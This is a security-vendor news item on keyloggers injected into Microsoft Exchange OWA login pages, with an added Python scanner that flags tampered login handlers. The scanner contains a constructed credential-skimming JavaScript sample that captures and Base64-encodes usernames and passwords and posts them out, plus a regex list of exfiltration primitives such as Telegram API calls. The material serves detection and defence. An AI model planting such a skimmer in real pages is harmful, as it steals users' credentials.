Positive Technologies warns of attacks through infected Microsoft Exchange servers

A total of 65 victim organizations have been identified in 26 countries, and the (Ex)Cobalt group has been observed using a similar attack technique.

A new study by Positive Technologies shows that since the beginning of 2025, nine Russian companies, four of which are software developers, have suffered cyberattacks through compromised Outlook Web Access (OWA) login pages on their Microsoft Exchange servers. The attackers embedded malicious code into the legitimate authentication pages, which allowed them to remain undetected for extended periods while harvesting user credentials.

In May 2024, the Incident Response team at the Positive Technologies Expert Security Center (PT ESC) discovered an attack that used a previously unknown keylogger [1] injected into the login page of Microsoft Exchange Server. The hackers typically injected malicious code into the clkLgn function (the handler for the login button) and intercepted the plaintext usernames and passwords that users entered when authenticating to Outlook Web Access (OWA).

Similar incidents were registered in 2025 as well. Positive Technologies discovered nine compromised Russian companies, including software developers and organizations in the fields of education, construction, aerospace industry, public sector, and the military-industrial complex.

In total, the PT ESC Incident Response team identified around 65 victims across 26 countries. Most of the infected servers are in Russia, Vietnam, and Taiwan. The attacks most frequently targeted government institutions, IT firms, industrial enterprises, and logistics companies.

"Having compromised corporate servers, the attackers inject malicious code into Microsoft Exchange authentication pages. This technique enables them to gain persistence in the system and stay undetected for several months. The operating principle of keyloggers used in such attacks is similar across most affected companies, but the methods of data transmission vary: from writing to a file on a server accessible from the internet to sending data through DNS tunnels or Telegram bots. As a result, hackers gain access to corporate user accounts by bypassing insufficiently effective security controls," says Klimentiy Galkin, Threat Intelligence Specialist at the Positive Technologies Expert Security Center.
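The practical check that follows from the description above is to treat the clkLgn handler as a monitored artifact: hash it against a copy from a pristine install of the same Exchange build, and flag any exfiltration primitive (XMLHttpRequest, fetch, sendBeacon, image beacons, Base64 encoding, Telegram API hosts) that a plain form-submit handler has no reason to contain. The script below is an added example written for this page, not code from Positive Technologies or Microsoft. Both JavaScript samples are constructed stand-ins: the "clean" one only mimics the shape of the real handler, the "injected" one shows the skimmer pattern the article describes, and the collector path in it is hypothetical. On a real server you would point it at the logon page under the FrontEnd HttpProxy owa\auth directory and take the baseline hash from a clean installation of the same cumulative update, since the legitimate file changes between updates.

```python
import hashlib
import re
import sys

# Constructed stand-in for the clkLgn click handler of a clean OWA logon page.
# This is not Microsoft's code; it only mimics the shape of the real handler
# (read the form, honour the "private computer" option, submit) so that the
# scanner has a known-good body to hash and diff against.
CLEAN_LOGON_JS = """
function gbid(id) { return document.getElementById(id); }
function clkLgn() {
    var f = document.forms["logonForm"];
    if (gbid("rdoPrvt").checked) { setPrivateCookie(); }
    f.submit();
}
"""

# Constructed example of the injection pattern described in the article: the same
# handler with a few lines added that read the plaintext credentials and post them
# to a hypothetical collector path before the genuine form submission runs.
INJECTED_LOGON_JS = """
function gbid(id) { return document.getElementById(id); }
function clkLgn() {
    var f = document.forms["logonForm"];
    var u = gbid("username").value, p = gbid("password").value;
    var x = new XMLHttpRequest();
    x.open("POST", "/owa/auth/collect.aspx", true);   // hypothetical path
    x.send(btoa(u + ":" + p));
    if (gbid("rdoPrvt").checked) { setPrivateCookie(); }
    f.submit();
}
"""

# Primitives a credential skimmer needs to get data off the page. A clean clkLgn
# handler submits the form and sets a cookie; it has no reason to use any of these.
EXFIL_INDICATORS = {
    "xhr": re.compile(r"\bXMLHttpRequest\b"),
    "fetch": re.compile(r"\bfetch\s*\("),
    "beacon": re.compile(r"\bsendBeacon\b"),
    "image_beacon": re.compile(r"\bnew\s+Image\b"),
    "websocket": re.compile(r"\bWebSocket\b"),
    "encoding": re.compile(r"\b(btoa|encodeURIComponent)\s*\("),
    "telegram": re.compile(r"api\.telegram\.org"),
}


def extract_function(js: str, name: str):
    """Return the source text of `function <name>(...) {...}`, or None if absent.

    Brace matching is deliberately simple (braces inside string literals are not
    skipped); for a minified or obfuscated page rely on the whole-file hash instead.
    """
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", js)
    if m is None:
        return None
    body_start = js.find("{", m.end())
    if body_start < 0:
        return None
    depth = 0
    for i in range(body_start, len(js)):
        if js[i] == "{":
            depth += 1
        elif js[i] == "}":
            depth -= 1
            if depth == 0:
                return js[m.start():i + 1]
    return None


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def scan_logon_page(js: str, baseline_hash: str) -> dict:
    """Compare the clkLgn handler with a known-good hash and look for exfil primitives."""
    fn = extract_function(js, "clkLgn")
    if fn is None:
        return {"status": "missing", "hash_drift": True, "indicators": []}
    indicators = sorted(n for n, rx in EXFIL_INDICATORS.items() if rx.search(fn))
    drift = sha256(fn) != baseline_hash
    status = "suspicious" if (drift or indicators) else "clean"
    return {"status": status, "hash_drift": drift, "indicators": indicators}


if __name__ == "__main__":
    # Baseline from the constructed clean sample; in production take it from a
    # pristine install of the same Exchange cumulative update.
    baseline = sha256(extract_function(CLEAN_LOGON_JS, "clkLgn"))
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            print(sys.argv[1], scan_logon_page(fh.read(), baseline))
    else:
        for label, sample in (("clean", CLEAN_LOGON_JS), ("injected", INJECTED_LOGON_JS)):
            print(label, scan_logon_page(sample, baseline))
```

Run it with no arguments to see the constructed clean sample reported as clean and the injected one as suspicious with hash drift plus the "xhr" and "encoding" indicators; pass a file path to scan a real logon page. The hash comparison is the authoritative signal (the indicator list is there to tell an analyst what to look at first), and because the article notes that some keyloggers write captured data to a file reachable from the internet, the same sweep should also list recently created or modified files in the OWA auth directory.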

According to the experts, the attackers exploited well-known vulnerabilities in public-facing Microsoft Exchange servers to inject malware. However, not all of the compromised servers had publicly known vulnerabilities. This suggests that other attack vectors may have been used to breach them.

To counter these threats, companies are advised to implement vulnerability management systems, such as MaxPatrol VM, along with vulnerability scanners, such as XSpider. PT Network Attack Discovery, a behavioral analysis system for network traffic, and PT Application Firewall, a web application firewall, help protect web applications and detect malicious network activity. In addition, SIEM and EDR solutions enable cybersecurity teams to monitor activity on critical servers. Get your cybersecurity team ready for real-world challenges on Standoff Defend, an online cyberrange. Train on virtual IT infrastructures modeled after typical corporate environments, hone your defense skills under the guidance of experienced mentors, and elevate your professional competencies to a new level.

[1] A keylogger is a piece of software or hardware that captures and logs keystrokes on a user's keyboard without their knowledge.
